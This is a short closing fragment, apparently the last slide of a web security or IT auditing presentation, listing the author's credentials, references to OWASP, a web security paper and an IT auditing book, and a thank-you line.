By Kishore Kumar M, M.Sc(IS), CISA, E-MBA, CSM

References:
www.owasp.org
http://advosys.ca/papers/web/61-web-security.html
'IT AUDITING Using Controls To Protect Information Assets' by Chris Davis, Mike Schiller, and Kevin Wheeler

Page 38:

Thank You